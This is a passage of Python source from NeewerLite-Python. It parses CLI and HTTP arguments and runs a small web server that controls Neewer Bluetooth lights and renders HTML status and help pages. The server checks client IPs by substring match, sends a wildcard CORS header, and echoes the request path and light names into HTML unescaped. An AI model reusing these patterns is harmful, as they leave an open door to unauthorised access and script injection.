for a in range(len(listToProcess)):
if listToProcess[a] != "-h" and listToProcess[a][:2] != "--": # if the dashes aren't in the current item (and it's not the -h flag)
if listToProcess[a][:1] == "-": # if the current parameter only has one dash (typed wrongly)
listToProcess[a] = "--" + listToProcess[a][1:].lower() # then remove that, and add the double dash and switch to lowercase
else: # the parameter has no dashes at all, so add them
listToProcess[a] = "--" + listToProcess[a].lower() # add the dashes + switch to lowercase to properly parse as arguments below
else: # if the dashes are already in the current item
listToProcess[a] = listToProcess[a].lower() # we don't need to add dashes, so just switch to lowercase
# ARGUMENTS EACH MODE HAS ACCESS TO
acceptable_arguments = ["--light", "--mode", "--temp", "--hue", "--sat", "--bri", "--intensity",
"--scene", "--animation", "--list", "--on", "--off", "--force_instance"]
# MODE-SPECIFIC ARGUMENTS
if inStartupMode == True: # if we're using the GUI or CLI, then add these arguments to the list
acceptable_arguments.extend(["--http", "--cli", "--silent", "--help"])
else: # if we're using the HTTP server, then add these arguments to the list
acceptable_arguments.extend(["--discover", "--nopage", "--link", "--use_preset", "--save_preset"])
# KICK OUT ANY PARAMETERS THAT AREN'T IN THE "ACCEPTABLE ARGUMENTS" LIST
for a in range(len(listToProcess) - 1, -1, -1):
if not any(x in listToProcess[a] for x in acceptable_arguments): # if the current argument is invalid
if inStartupMode == True:
if listToProcess[a] != "-h": # and the argument isn't "-h" (for help)
listToProcess.pop(a) # delete the invalid argument from the list
else: # if we're not in startup mode, then also delete the "-h" flag
listToProcess.pop(a) # delete the invalid argument from the list
# IF THERE ARE NO VALID PARAMETERS LEFT TO PARSE, THEN RETURN THAT TO THE HTTP SERVER
if inStartupMode == False and len(listToProcess) == 0:
printDebugString("There are no usable parameters from the HTTP request!")
return []
# FORCE VALUES THAT NEED PARAMETERS TO HAVE ONE, AND VALUES THAT REQUIRE NO PARAMETERS TO HAVE NONE
for a in range(len(listToProcess)):
if listToProcess[a].find("--silent") != -1:
listToProcess[a] = "--silent"
elif listToProcess[a].find("--cli") != -1:
listToProcess[a] = "--cli"
elif listToProcess[a].find("--http") != -1:
listToProcess[a] = "--http"
elif listToProcess[a].find("--discover") != -1:
listToProcess[a] = "--discover"
elif listToProcess[a].find("--off") != -1:
listToProcess[a] = "--off"
elif listToProcess[a].find("--on") != -1:
listToProcess[a] = "--on"
elif listToProcess[a] == "--link":
listToProcess[a] = "--link=-1"
elif listToProcess[a] == "--use_preset":
listToProcess[a] = "--use_preset=-1"
elif listToProcess[a] == "--save_preset":
listToProcess[a] = "--save_preset=-1"
# PARSE THE ARGUMENT LIST FOR CUSTOM PARAMETERS
parser = argparse.ArgumentParser()
parser.add_argument("--list", action="store_true", help="Scan for nearby Neewer lights and list them on the CLI") # list the currently available lights
parser.add_argument("--http", action="store_true", help="Use an HTTP server to send commands to Neewer lights using a web browser")
parser.add_argument("--silent", action="store_false", help="Don't show any debug information in the console")
parser.add_argument("--cli", action="store_false", help="Don't show the GUI at all, just send command to one light and quit")
parser.add_argument("--force_instance", action="store_false", help="Force a new instance of NeewerLite-Python if another one is already running")
# HTML SERVER SPECIFIC PARAMETERS
if inStartupMode == False:
parser.add_argument("--discover", action="store_true") # tell the HTTP server to search for newly added lights
parser.add_argument("--link", default=-1) # link a specific light to NeewerLite-Python
parser.add_argument("--nopage", action="store_false") # don't render an HTML page
parser.add_argument("--use_preset", default=-1) # number of custom preset to use via the HTTP interface
parser.add_argument("--save_preset", default=-1) # option to save a custom snapshot preset via the HTTP interface
parser.add_argument("--on", action="store_true", help="Turn the light on")
parser.add_argument("--off", action="store_true", help="Turn the light off")
parser.add_argument("--light", default="", help="The MAC Address (XX:XX:XX:XX:XX:XX) of the light you want to send a command to or ALL to find and control all lights (only valid when also using --cli switch)")
parser.add_argument("--mode", default="CCT", help="[DEFAULT: CCT] The current control mode - options are HSI, CCT and either ANM or SCENE")
parser.add_argument("--temp", "--temperature", default="56", help="[DEFAULT: 56(00)K] (CCT mode) - the color temperature (3200K+) to set the light to")
parser.add_argument("--hue", default="240", help="[DEFAULT: 240] (HSI mode) - the hue (0-360 degrees) to set the light to")
parser.add_argument("--sat", "--saturation", default="100", help="[DEFAULT: 100] (HSI mode) The saturation (how vibrant the color is) to set the light to")
parser.add_argument("--bri", "--brightness", "--intensity", default="100", help="[DEFAULT: 100] (CCT/HSI/ANM mode) The brightness (intensity) to set the light to")
parser.add_argument("--scene", "--animation", default="1", help="[DEFAULT: 1] (ANM or SCENE mode) The animation (1-9) to use in Scene mode")
args = parser.parse_args(listToProcess)
if args.force_instance == False: # --force_instance uses store_false, so False here means the flag was given and another instance should be allowed
global anotherInstance
anotherInstance = False # change the global to False to allow new instances
if args.silent == True:
if inStartupMode == True:
if args.list != True: # if we're not looking for lights using --list, then print line
printDebugString("Starting program with command-line arguments")
else:
printDebugString("Processing HTTP arguments")
args.cli = False # we're running the CLI, so don't initialize the GUI
args.silent = printDebug # we're not changing the silent flag, pass on the current printDebug setting
if args.http == True:
return ["HTTP", args.silent] # special mode - don't do any other mode/color/etc. processing, just jump into running the HTML server
if inStartupMode == False:
# HTTP specific parameter returns!
if args.discover == True:
return[None, args.nopage, None, "discover"] # discover new lights
if args.link != -1:
return[None, args.nopage, args.link, "link"] # return the value defined by the parameter
if args.list == True:
return [None, args.nopage, None, "list"]
if args.use_preset != -1:
return[None, args.nopage, testValid("use_preset", int(args.use_preset), 1, 1, 8), "use_preset"]
else:
# If we request "LIST" from the CLI, then return a CLI list of lights available
if args.list == True:
return["LIST", False]
# CHECK TO SEE IF THE LIGHT SHOULD BE TURNED ON OR OFF
if args.on == True: # we want to turn the light on
return [args.cli, args.silent, args.light, "ON"]
elif args.off == True: # we want to turn the light off
return [args.cli, args.silent, args.light, "OFF"]
# IF THE LIGHT ISN'T BEING TURNED OFF, CHECK TO SEE IF MODES ARE BEING SET
if args.mode.lower() == "hsi":
return [args.cli, args.silent, args.light, "HSI",
testValid("hue", args.hue, 240, 0, 360),
testValid("sat", args.sat, 100, 0, 100),
testValid("bri", args.bri, 100, 0, 100)]
elif args.mode.lower() in ("anm", "scene"):
return [args.cli, args.silent, args.light, "ANM",
testValid("scene", args.scene, 1, 1, 9),
testValid("bri", args.bri, 100, 0, 100)]
else: # we've either asked for CCT mode, or gave an invalid mode name
if args.mode.lower() != "cct": # if we're not actually asking for CCT mode, display error message
printDebugString(" >> Improper mode selected with --mode command - valid entries are")
printDebugString(" >> CCT, HSI or either ANM or SCENE, so rolling back to CCT mode.")
# RETURN CCT MODE PARAMETERS IN CCT/ALL OTHER CASES
return [args.cli, args.silent, args.light, "CCT",
testValid("temp", args.temp, 56, 32, 85),
testValid("bri", args.bri, 100, 0, 100)]
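# processCommands() returns differently shaped lists depending on what was requested; a summary
# of the shapes used elsewhere in this file (drawn from the return statements above):
#   ["HTTP", silent]                         - start the HTTP server
#   ["LIST", False]                          - CLI listing mode
#   [cli, silent, light, "ON"/"OFF"]         - power commands
#   [cli, silent, light, "CCT", temp, bri]   - CCT mode
#   [cli, silent, light, "HSI", hue, sat, bri] - HSI mode
#   [cli, silent, light, "ANM", scene, bri]  - animation/scene mode
#   [None, nopage, value, action]            - HTTP-server-specific actions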
def processHTMLCommands(paramsList, loop):
global threadAction
if threadAction == "": # if we're not already processing info in another thread
threadAction = "HTTP"
if len(paramsList) != 0:
if paramsList[3] == "discover": # we asked to discover new lights
loop.run_until_complete(findDevices()) # find the lights available to control
# try to connect to each light
if autoConnectToLights == True:
loop.run_until_complete(parallelAction("connect", [-1], False)) # try to connect to *all* lights in parallel
elif paramsList[3] == "link": # we asked to connect to a specific light
selectedLights = returnLightIndexesFromMacAddress(paramsList[2])
if len(selectedLights) > 0:
loop.run_until_complete(parallelAction("connect", selectedLights, False)) # try to connect to all *selected* lights in parallel
elif paramsList[3] == "use_preset":
recallCustomPreset(paramsList[2] - 1, False, loop)
elif paramsList[3] == "save_preset":
pass
else: # we want to write a value to a specific light
if paramsList[3] == "CCT": # calculate CCT bytestring
calculateByteString(colorMode=paramsList[3], temp=paramsList[4], brightness=paramsList[5])
elif paramsList[3] == "HSI": # calculate HSI bytestring
calculateByteString(colorMode=paramsList[3], HSI_H=paramsList[4], HSI_S=paramsList[5], HSI_I=paramsList[6])
elif paramsList[3] == "ANM": # calculate ANM/SCENE bytestring
calculateByteString(colorMode=paramsList[3], animation=paramsList[4], brightness=paramsList[5])
elif paramsList[3] == "ON": # turn the light(s) on
setPowerBytestring("ON")
elif paramsList[3] == "OFF": # turn the light(s) off
setPowerBytestring("OFF")
selectedLights = returnLightIndexesFromMacAddress(paramsList[2])
if len(selectedLights) > 0:
loop.run_until_complete(writeToLight(selectedLights, False))
threadAction = "" # clear the thread variable
else:
printDebugString("The HTTP Server requested an action, but we're already working on one. Please wait...")
def returnLightIndexesFromMacAddress(addresses):
foundIndexes = [] # the list of indexes for the lights you specified
if addresses == "*": # if we ask for every light available, then return that
for a in range(len(availableLights)):
foundIndexes.append(a)
else: # break down what we're asking for into indexes
addressesToCheck = addresses.split(";")
for a in range(len(addressesToCheck)):
try: # if the specified light is just an index, then return the light you asked for
currentLight = int(addressesToCheck[a]) - 1 # check to see if the current light can be converted to an integer
# if the above succeeds, make sure that the index returned is a valid light index
if currentLight < 0 or currentLight >= len(availableLights):
currentLight = -1 # if the index is less than 0, or higher than the last available light, then... nada
except ValueError: # we're most likely asking for a MAC address instead of an integer index
currentLight = -1
for b in range(len(availableLights)):
if addressesToCheck[a].upper() == availableLights[b][0].address.upper(): # if the MAC address specified matches the current light
currentLight = b
break
if currentLight != -1: # the found light index is valid
foundIndexes.append(currentLight) # add the found index to the list of indexes
return foundIndexes
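# The addresses argument accepted above can take several forms (the examples are illustrative):
#   "*"                     - every light currently in availableLights
#   "1;3"                   - 1-based list positions, separated by semicolons
#   "11:22:33:44:55:66;2"   - MAC addresses and positions can be mixed freely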
class NLPythonServer(BaseHTTPRequestHandler):
loop = asyncio.get_event_loop()
def _send_cors_headers(self):
self.send_header("Access-Control-Allow-Origin", "*")
self.send_header("Access-Control-Allow-Methods", "GET, OPTIONS")
def do_OPTIONS(self):
self.send_response(200)
self._send_cors_headers()
self.end_headers()
def do_GET(self):
if self.path == "/favicon.ico": # if favicon.ico is specified, then send a 404 error and stop processing
try:
self.send_error(404)
except ConnectionAbortedError:
printDebugString("Could not serve the error page, the HTTP server is already busy with another request.")
return
else:
# CHECK THE LENGTH OF THE URL REQUEST AND SEE IF IT'S TOO LONG
if len(self.path) > 159: # INCREASED LENGTH DUE TO ADDITION OF doAction IN THE URL
# THE LAST REQUEST WAS WAY TOO LONG, SO QUICKLY RENDER AN ERROR PAGE AND RETURN FROM THE HTTP RENDERER
writeHTMLSections(self, "httpheaders")
writeHTMLSections(self, "htmlheaders")
writeHTMLSections(self, "quicklinks")
writeHTMLSections(self, "errorHelp", "The last request you provided was too long! The NeewerLite-Python HTTP server can only accept URL commands less than 132 characters long after /NeewerLite-Python/doAction?")
writeHTMLSections(self, "quicklinks")
writeHTMLSections(self, "htmlendheaders")
return
# CHECK TO SEE IF THE IP REQUESTING ACCESS IS IN THE LIST OF "acceptable_HTTP_IPs"
clientIP = self.client_address[0] # the IP address of the machine making the request
acceptedIP = False
for check in range(len(acceptable_HTTP_IPs)): # check all the "accepted" IP addresses against the current requesting IP
if acceptedIP != True: # if we haven't found the IP in the accepted list, then keep checking
if acceptable_HTTP_IPs[check] in clientIP:
acceptedIP = True # if we're good to go, then we can just move on
# IF THE IP MAKING THE REQUEST IS NOT IN THE LIST OF APPROVED ADDRESSES, THEN RETURN A "FORBIDDEN" ERROR
if acceptedIP == False:
self.send_error(403, "The IP of the device you're making the request from (" + clientIP + ") has to be in the list of accepted IP addresses in order to use the NeewerLite-Python HTTP Server, any outside addresses will generate this Forbidden error. To use this device with NeewerLite-Python, add its IP address (or range of IP addresses) to the list of acceptable IPs")
return
acceptableURL = "/NeewerLite-Python/doAction?"
if not acceptableURL in self.path: # if we ask for something that's not the main directory, then redirect to the main error page
self.send_response(302)
self.send_header('Location', acceptableURL)
self.end_headers()
return
else: # if the URL contains "/NeewerLite-Python/doAction?" then it's a valid URL
writeHTMLSections(self, "httpheaders")
# BREAK THE URL INTO USABLE PARAMETERS
paramsList = self.path.replace(acceptableURL, "").split("&") # split the included params into a list
paramsList = processCommands(paramsList) # process the commands returned from the HTTP parameters
if len(paramsList) == 0: # we have no valid parameters, so show the error page
writeHTMLSections(self, "htmlheaders")
writeHTMLSections(self, "quicklinks")
writeHTMLSections(self, "errorHelp", "You didn't provide any valid parameters in the last URL. To send multiple parameters to NeewerLite-Python, separate each one with a & character.")
writeHTMLSections(self, "quicklinks")
writeHTMLSections(self, "htmlendheaders")
return
else:
if paramsList[1] == True:
writeHTMLSections(self, "htmlheaders") # write the HTML header section
writeHTMLSections(self, "quicklinks")
self.wfile.write(bytes("<H1>Request Successful!</H1>\n", "utf-8"))
self.wfile.write(bytes("Last Request: <EM>" + self.path + "</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("From IP: <EM>" + clientIP + "</EM><BR><BR>\n", "utf-8"))
if paramsList[3] != "list":
if paramsList[1] == True:
self.wfile.write(bytes("Provided Parameters:<BR>\n", "utf-8"))
if len(paramsList) <= 2:
for a in range(len(paramsList)):
self.wfile.write(bytes(" " + str(paramsList[a]) + "<BR>\n", "utf-8"))
else:
if paramsList[3] == "use_preset":
self.wfile.write(bytes(" Preset to Use: " + str(paramsList[2]) + "<BR>\n", "utf-8"))
elif paramsList[3] == "save_preset":
pass # TODO: implement saving presets!
else:
self.wfile.write(bytes(" Light(s) to connect to: " + str(paramsList[2]) + "<BR>\n", "utf-8"))
self.wfile.write(bytes(" Mode: " + str(paramsList[3]) + "<BR>\n", "utf-8"))
if paramsList[3] == "CCT":
self.wfile.write(bytes(" Color Temperature: " + str(paramsList[4]) + "00K<BR>\n", "utf-8"))
self.wfile.write(bytes(" Brightness: " + str(paramsList[5]) + "<BR>\n", "utf-8"))
elif paramsList[3] == "HSI":
self.wfile.write(bytes(" Hue: " + str(paramsList[4]) + "<BR>\n", "utf-8"))
self.wfile.write(bytes(" Saturation: " + str(paramsList[5]) + "<BR>\n", "utf-8"))
self.wfile.write(bytes(" Brightness: " + str(paramsList[6]) + "<BR>\n", "utf-8"))
elif paramsList[3] == "ANM" or paramsList[3] == "SCENE":
self.wfile.write(bytes(" Animation Scene: " + str(paramsList[4]) + "<BR>\n", "utf-8"))
self.wfile.write(bytes(" Brightness: " + str(paramsList[5]) + "<BR>\n", "utf-8"))
self.wfile.write(bytes("<BR><HR><BR>\n", "utf-8"))
# PROCESS THE HTML COMMANDS IN ANOTHER THREAD
htmlProcessThread = threading.Thread(target=processHTMLCommands, args=(paramsList, loop), name="htmlProcessThread")
htmlProcessThread.start()
if paramsList[1] == True: # if we're rendering the results page, show the list of currently available lights and presets
totalLights = len(availableLights)
if totalLights == 0: # there are no lights available to you at the moment!
self.wfile.write(bytes("NeewerLite-Python is not currently set up with any Neewer lights. To discover new lights, <A HREF='doAction?discover'>click here</a>.<BR>\n", "utf-8"))
else:
self.wfile.write(bytes("List of available Neewer lights:<BR><BR>\n", "utf-8"))
self.wfile.write(bytes("<TABLE WIDTH='98%' BORDER='1'>\n", "utf-8"))
self.wfile.write(bytes(" <TR>\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:2%; text-align:left'>ID #\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:18%; text-align:left'>Custom Name</TH>\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:18%; text-align:left'>Light Type</TH>\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:30%; text-align:left'>MAC Address/GUID</TH>\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:5%; text-align:left'>RSSI</TH>\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:5%; text-align:left'>Linked</TH>\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:22%; text-align:left'>Last Sent Value</TH>\n", "utf-8"))
self.wfile.write(bytes(" </TR>\n", "utf-8"))
for a in range(totalLights):
self.wfile.write(bytes(" <TR>\n", "utf-8"))
self.wfile.write(bytes(" <TD STYLE='background-color:rgb(173,255,47)'>" + str(a + 1) + "</TD>\n", "utf-8")) # light ID #
self.wfile.write(bytes(" <TD STYLE='background-color:rgb(240,248,255)'>" + availableLights[a][2] + "</TD>\n", "utf-8")) # light custom name
self.wfile.write(bytes(" <TD STYLE='background-color:rgb(240,248,255)'>" + availableLights[a][0].name + "</TD>\n", "utf-8")) # light type
self.wfile.write(bytes(" <TD STYLE='background-color:rgb(240,248,255)'>" + availableLights[a][0].address + "</TD>\n", "utf-8")) # light MAC address
self.wfile.write(bytes(" <TD STYLE='background-color:rgb(240,248,255)'>" + str(availableLights[a][0].rssi) + " dBm</TD>\n", "utf-8")) # light RSSI (signal quality)
try:
if availableLights[a][1].is_connected:
self.wfile.write(bytes(" <TD STYLE='background-color:rgb(240,248,255)'>" + "Yes" + "</TD>\n", "utf-8")) # is the light linked?
else:
self.wfile.write(bytes(" <TD STYLE='background-color:rgb(240,248,255)'>" + "<A HREF='doAction?link=" + str(a + 1) + "'>No</A></TD>\n", "utf-8")) # is the light linked?
except Exception as e:
self.wfile.write(bytes(" <TD STYLE='background-color:rgb(240,248,255)'>" + "<A HREF='doAction?link=" + str(a + 1) + "'>No</A></TD>\n", "utf-8")) # is the light linked?
self.wfile.write(bytes(" <TD STYLE='background-color:rgb(240,248,255)'>" + updateStatus(False, availableLights[a][3]) + "</TD>\n", "utf-8")) # the last sent value to the light
self.wfile.write(bytes(" </TR>\n", "utf-8"))
self.wfile.write(bytes("</TABLE>\n", "utf-8"))
self.wfile.write(bytes("<BR><HR><BR>\n", "utf-8"))
self.wfile.write(bytes("<A ID='presets'>List of available custom presets to use:</A><BR><BR>\n", "utf-8"))
self.wfile.write(bytes("<TABLE WIDTH='98%' BORDER='1'>\n", "utf-8"))
self.wfile.write(bytes(" <TR>\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:4%; text-align:left'>Preset\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:46%; text-align:left'>Preset Parameters</TH>\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:4%; text-align:left'>Preset\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:46%; text-align:left'>Preset Parameters</TH>\n", "utf-8"))
self.wfile.write(bytes(" </TR>\n", "utf-8"))
for a in range(4): # build the list itself, showing 2 presets next to each other
currentPreset = (2 * a)
self.wfile.write(bytes(" <TR>\n", "utf-8"))
self.wfile.write(bytes(" <TD ALIGN='CENTER' STYLE='background-color:rgb(173,255,47)'><FONT SIZE='+2'><A HREF='doAction?use_preset=" + str(currentPreset + 1) + "#presets'>" + str(currentPreset + 1) + "</A></FONT></TD>\n", "utf-8"))
self.wfile.write(bytes(" <TD VALIGN='TOP' STYLE='background-color:rgb(240,248,255)'>" + customPresetInfoBuilder(currentPreset, True) + "</TD>\n", "utf-8"))
self.wfile.write(bytes(" <TD ALIGN='CENTER' STYLE='background-color:rgb(173,255,47)'><FONT SIZE='+2'><A HREF='doAction?use_preset=" + str(currentPreset + 2) + "#presets'>" + str(currentPreset + 2) + "</A></FONT></TD>\n", "utf-8"))
self.wfile.write(bytes(" <TD VALIGN='TOP' STYLE='background-color:rgb(240,248,255)'>" + customPresetInfoBuilder(currentPreset + 1, True) + "</TD>\n", "utf-8"))
self.wfile.write(bytes(" </TR>\n", "utf-8"))
self.wfile.write(bytes("</TABLE>\n", "utf-8"))
if paramsList[1] == True:
writeHTMLSections(self, "quicklinks") # add the footer to the bottom of the page
writeHTMLSections(self, "htmlendheaders") # add the ending section to the very bottom
def writeHTMLSections(self, theSection, errorMsg = ""):
if theSection == "httpheaders":
self.send_response(200)
self._send_cors_headers()
self.send_header("Content-type", "text/html")
self.end_headers()
elif theSection == "htmlheaders":
self.wfile.write(bytes("<!DOCTYPE html>\n", "utf-8"))
self.wfile.write(bytes("<HTML>\n<HEAD>\n", "utf-8"))
self.wfile.write(bytes("<TITLE>NeewerLite-Python 0.11 HTTP Server by Zach Glenwright</TITLE>\n</HEAD>\n", "utf-8"))
self.wfile.write(bytes("<BODY>\n", "utf-8"))
elif theSection == "errorHelp":
self.wfile.write(bytes("<H1>Invalid request!</H1>\n", "utf-8"))
self.wfile.write(bytes("Last Request: <EM>" + self.path + "</EM><BR>\n", "utf-8"))
self.wfile.write(bytes(errorMsg + "<BR><BR>\n", "utf-8"))
self.wfile.write(bytes("Valid parameters to use -<BR>\n", "utf-8"))
self.wfile.write(bytes("<STRONG>list</STRONG> - list the current lights NeewerLite-Python has available to it and the custom presets it can use<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?list</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("<STRONG>discover</STRONG> - tell NeewerLite-Python to scan for new lights<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?discover</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("<STRONG>nopage</STRONG> - send a command to the HTTP server, but don't render the webpage showing the results (<EM>useful, for example, on a headless Raspberry Pi where you don't necessarily want to see the results page</EM>)<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?nopage</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("<STRONG>link=</STRONG> - (value: <EM>index of light to link to</EM>) manually link to a specific light - you can specify multiple lights with semicolons (so link=1;2 would try to link to both lights 1 and 2)<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?link=1</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("<STRONG>light=</STRONG> - the MAC address (or current index of the light) you want to send a command to - you can specify multiple lights with semicolons (so light=1;2 would send a command to both lights 1 and 2)<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?light=11:22:33:44:55:66</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("<STRONG>mode=</STRONG> - the mode (value: <EM>HSI, CCT, and either ANM or SCENE</EM>) - the color mode to switch the light to<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?mode=CCT</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("<STRONG>use_preset=</STRONG> - (value: <EM>1-8</EM>) - use a custom global or snapshot preset<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?use_preset=2</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("(CCT mode only) <STRONG>temp=</STRONG> or <STRONG>temperature=</STRONG> - (value: <EM>3200 to 8500</EM>) the color temperature in CCT mode to set the light to<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?temp=5200</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("(HSI mode only) <STRONG>hue=</STRONG> - (value: <EM>0 to 360</EM>) the hue value in HSI mode to set the light to<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?hue=240</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("(HSI mode only) <STRONG>sat=</STRONG> or <STRONG>saturation=</STRONG> - (value: <EM>0 to 100</EM>) the color saturation value in HSI mode to set the light to<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?sat=65</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("(ANM/SCENE mode only) <STRONG>scene=</STRONG> - (value: <EM>1 to 9</EM>) which animation (scene) to switch the light to<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?scene=3</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("(CCT/HSI/ANM modes) <STRONG>bri=</STRONG>, <STRONG>brightness=</STRONG> or <STRONG>intensity=</STRONG> - (value: <EM>0 to 100</EM>) how bright you want the light<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?brightness=80</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("<BR><BR>More examples -<BR>\n", "utf-8"))
self.wfile.write(bytes(" Set the light with MAC address <EM>11:22:33:44:55:66</EM> to <EM>CCT</EM> mode, with a color temperature of <EM>5200</EM> and brightness of <EM>40</EM><BR>\n", "utf-8"))
self.wfile.write(bytes(" <EM>http://(server address)/NeewerLite-Python/doAction?light=11:22:33:44:55:66&mode=CCT&temp=5200&bri=40</EM><BR><BR>\n", "utf-8"))
self.wfile.write(bytes(" Set the light with MAC address <EM>11:22:33:44:55:66</EM> to <EM>HSI</EM> mode, with a hue of <EM>70</EM>, saturation of <EM>50</EM> and brightness of <EM>10</EM><BR>\n", "utf-8"))
self.wfile.write(bytes(" <EM>http://(server address)/NeewerLite-Python/doAction?light=11:22:33:44:55:66&mode=HSI&hue=70&sat=50&bri=10</EM><BR><BR>\n", "utf-8"))
self.wfile.write(bytes(" Set the first light available to <EM>SCENE</EM> mode, using the <EM>first</EM> animation and brightness of <EM>55</EM><BR>\n", "utf-8"))
self.wfile.write(bytes(" <EM>http://(server address)/NeewerLite-Python/doAction?light=1&mode=SCENE&scene=1&bri=55</EM><BR><BR>\n", "utf-8"))
self.wfile.write(bytes(" Use the 2nd custom preset, but don't render the webpage showing the results<BR>\n", "utf-8"))
self.wfile.write(bytes(" <EM>http://(server address)/NeewerLite-Python/doAction?use_preset=2&nopage</EM><BR>\n", "utf-8"))
elif theSection == "quicklinks":
footerLinks = "Shortcut links: "
footerLinks = footerLinks + "<A HREF='doAction?discover'>Scan for New Lights</A> | "
footerLinks = footerLinks + "<A HREF='doAction?list'>List Currently Available Lights and Custom Presets</A>"
self.wfile.write(bytes("<HR>" + footerLinks + "<HR>\n", "utf-8"))
elif theSection == "htmlendheaders":
self.wfile.write(bytes("<CENTER><A HREF='https://github.com/taburineagle/NeewerLite-Python/'>NeewerLite-Python 0.11</A> / HTTP Server / by Zach Glenwright<BR></CENTER>\n", "utf-8"))
self.wfile.write(bytes("</BODY>\n</HTML>", "utf-8"))
def formatStringForConsole(theString, maxLength):
if theString == "-": # return a header divider if the string is "-"
return "-" * maxLength
else:
if len(theString) == maxLength: # if the string is the max length, then just return the string
return theString
if len(theString) < maxLength: # if the string fits in the max length, then add spaces to pad it out
return theString + " " * (maxLength - len(theString))
else: # truncate the string, it's too long
return theString[0:maxLength - 4] + " ..."
def createLightPrefsFolder():
# CREATE THE light_prefs FOLDER IF IT DOESN'T EXIST
try:
os.mkdir(os.path.dirname(os.path.abspath(sys.argv[0])) + os.sep + "light_prefs")
except FileExistsError:
pass # the folder already exists, so we don't need to create it
def loadPrefsFile(globalPrefsFile = ""):
global findLightsOnStartup, autoConnectToLights, printDebug, maxNumOfAttempts, \
rememberLightsOnExit, acceptable_HTTP_IPs, customKeys, enableTabsOnLaunch, \
whiteListedMACs, rememberPresetsOnExit
if globalPrefsFile != "":
printDebugString("Loading global preferences from file...")
fileToOpen = open(globalPrefsFile)
mainPrefs = fileToOpen.read().splitlines()
fileToOpen.close()
acceptable_arguments = ["findLightsOnStartup", "autoConnectToLights", "printDebug", "maxNumOfAttempts", "rememberLightsOnExit", "acceptableIPs", \
"SC_turnOffButton", "SC_turnOnButton", "SC_scanCommandButton", "SC_tryConnectButton", "SC_Tab_CCT", "SC_Tab_HSI", "SC_Tab_SCENE", "SC_Tab_PREFS", \
"SC_Dec_Bri_Small", "SC_Inc_Bri_Small", "SC_Dec_Bri_Large", "SC_Inc_Bri_Large", \
"SC_Dec_1_Small", "SC_Inc_1_Small", "SC_Dec_2_Small", "SC_Inc_2_Small", "SC_Dec_3_Small", "SC_Inc_3_Small", \
"SC_Dec_1_Large", "SC_Inc_1_Large", "SC_Dec_2_Large", "SC_Inc_2_Large", "SC_Dec_3_Large", "SC_Inc_3_Large", \
"enableTabsOnLaunch", "whiteListedMACs", "rememberPresetsOnExit"]
# KICK OUT ANY PARAMETERS THAT AREN'T IN THE "ACCEPTABLE ARGUMENTS" LIST ABOVE
# THIS SECTION OF CODE IS *SLIGHTLY* DIFFERENT THAN THE CLI KICK OUT CODE
# THIS WAY, WE CAN HAVE COMMENTS IN THE PREFS FILE IF DESIRED
for a in range(len(mainPrefs) - 1, -1, -1):
if not any(x in mainPrefs[a] for x in acceptable_arguments): # if the current argument is invalid
mainPrefs.pop(a) # delete the invalid argument from the list
# NOW THAT ANY STRAGGLERS ARE OUT, ADD DASHES TO WHAT REMAINS TO PROPERLY PARSE IN THE PARSER
for a in range(len(mainPrefs)):
mainPrefs[a] = "--" + mainPrefs[a]
else:
mainPrefs = [] # submit an empty list to return the default values for everything
prefsParser = argparse.ArgumentParser() # parser for preference arguments
# SET PROGRAM DEFAULTS
prefsParser.add_argument("--findLightsOnStartup", default=1)
prefsParser.add_argument("--autoConnectToLights", default=1)
prefsParser.add_argument("--printDebug", default=1)
prefsParser.add_argument("--maxNumOfAttempts", default=6)
prefsParser.add_argument("--rememberLightsOnExit", default=0)
prefsParser.add_argument("--acceptableIPs", default=["127.0.0.1", "192.168", "10.0.0"])
prefsParser.add_argument("--whiteListedMACs", default=[])
prefsParser.add_argument("--rememberPresetsOnExit", default=1)
# SHORTCUT KEY CUSTOMIZATIONS
prefsParser.add_argument("--SC_turnOffButton", default="Ctrl+PgDown") # 0
prefsParser.add_argument("--SC_turnOnButton", default="Ctrl+PgUp") # 1
prefsParser.add_argument("--SC_scanCommandButton", default="Ctrl+Shift+S") # 2
